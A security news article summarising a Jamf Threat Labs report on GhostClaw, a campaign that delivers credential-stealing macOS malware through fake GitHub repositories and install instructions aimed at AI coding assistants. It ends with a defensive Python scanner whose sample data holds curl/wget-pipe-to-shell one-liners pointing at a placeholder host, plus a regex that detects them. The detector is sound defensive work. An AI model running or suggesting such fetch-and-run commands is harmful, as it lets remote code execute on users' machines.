A malicious GitHub repository | Image: Jamf Threat Labs
Jamf Threat Labs has released a new report detailing the evolution of GhostClaw, a sophisticated malware campaign that has pivoted its tactics to exploit the very heart of the modern developer ecosystem. By leveraging GitHub repositories and AI-assisted development workflows, the threat actors behind GhostClaw are successfully delivering credential-stealing payloads to macOS users under the guise of legitimate software.
The primary vector for this new wave of attacks involves a “parallel distribution method leveraging GitHub repositories”. These repositories are meticulously crafted to appear credible, often impersonating popular developer utilities, SDKs, or high-interest tools like trading bots.
To further deceive victims, the attackers have successfully manipulated social proof metrics. As Jamf Threat Labs notes:
“Several of the identified repositories have accumulated significant engagement, in some cases exceeding hundreds of stars, further reinforcing their perceived legitimacy”.
This shift is particularly dangerous because it expands the potential victim pool to “any user or automated workflow willing to execute commands sourced from online instructions”.
A standout feature of the GhostClaw campaign is its alignment with emerging technology trends. The researchers found that the threat actors are actively exploiting the rise of AI in coding.
“This campaign highlights a continued shift in attacker tradecraft, where distribution methods extend beyond traditional package registries into platforms such as GitHub and emerging AI-assisted development workflows”.
By embedding malicious code into instructions that developers might feed into AI coding assistants or execute as part of automated setup scripts, the attackers can introduce malware into sensitive environments with “minimal friction”.
The technical backbone of GhostClaw is designed for persistence and stealth. The campaign utilizes a single domain combined with unique identifiers to track different infection vectors. This allows the threat actor to “segment activity across different repositories or lures,” essentially running multiple specialized sub-campaigns simultaneously.
While earlier iterations of the malware used specific identifiers like complexarchaeologist1, Jamf found that newer versions use different values, suggesting a constantly evolving infrastructure.
GhostClaw is part of a growing trend of software supply chain-style attacks, similar to recent campaigns like Glassworm and PolinRider. Rather than targeting a single high-value individual, these methods allow attackers to “impact a larger number of systems through a single delivery mechanism”.
The reliance on familiar installation workflows and trusted ecosystems like GitHub significantly reduces the suspicion typically associated with downloading unknown software.
Jamf Threat Labs warns that as delivery methods move closer to the developer’s everyday tools, the responsibility for safety shifts to the user.
“Users and developers should remain cautious when executing installation commands sourced from online content, including repositories and automated tooling”. The report concludes that validating the origin and behavior of any code prior to execution is now a “critical step in reducing exposure”.
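As an added example (not Jamf's tooling and not code from the report), the following Python helper applies that advice to install snippets before they are run: it extracts the URLs that curl/wget would fetch, flags pipe-to-shell and command-substitution patterns, and groups flagged fetches by domain and identifier, mirroring the single-domain, per-lure-identifier tracking described above. The snippets, domain and identifiers are constructed placeholders, not indicators from the report.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample "install" one-liners of the kind a README or AI-generated
# setup guide might carry. Domain and identifiers are placeholders, not real IoCs.
SAMPLE_SNIPPETS = [
    "curl -fsSL https://installer.example/setup.sh?id=traderbot-42 | bash",
    "/bin/bash -c \"$(curl -fsSL https://installer.example/get/sdk-7)\"",
    "pip install -r requirements.txt",
    "wget -qO- https://installer.example/setup.sh?id=traderbot-42 | sh",
]

# A curl/wget invocation followed by the URL it fetches.
FETCH_RE = re.compile(r"\b(?:curl|wget)\b[^\n|\"')]*?(https?://[^\s\"')]+)")
# Remote content piped into a shell, or fetched inside $( ... ) for execution.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b|\$\(\s*(?:curl|wget)\b")


def analyze_snippet(snippet):
    """Describe what a snippet fetches and whether it executes that content."""
    findings = []
    for url in FETCH_RE.findall(snippet):
        parsed = urlparse(url)
        query = parse_qs(parsed.query)
        # Identifier: an explicit id= parameter, otherwise the last path segment.
        ident = query["id"][0] if "id" in query else (
            parsed.path.rstrip("/").rsplit("/", 1)[-1] or None)
        findings.append({"url": url, "domain": parsed.hostname, "identifier": ident})
    executes_remote = bool(findings) and bool(PIPE_TO_SHELL_RE.search(snippet))
    return {"snippet": snippet, "fetches": findings,
            "pipes_remote_to_shell": executes_remote}


def group_by_domain(snippets):
    """Cluster flagged snippets by fetch domain, collecting distinct identifiers.

    Several lures fetching from one domain with different identifiers is the
    segmentation pattern worth surfacing to a reviewer."""
    clusters = {}
    for snippet in snippets:
        result = analyze_snippet(snippet)
        if not result["pipes_remote_to_shell"]:
            continue
        for fetch in result["fetches"]:
            clusters.setdefault(fetch["domain"], set()).add(fetch["identifier"])
    return clusters


if __name__ == "__main__":
    for domain, idents in group_by_domain(SAMPLE_SNIPPETS).items():
        print(f"{domain}: {sorted(idents)}")
```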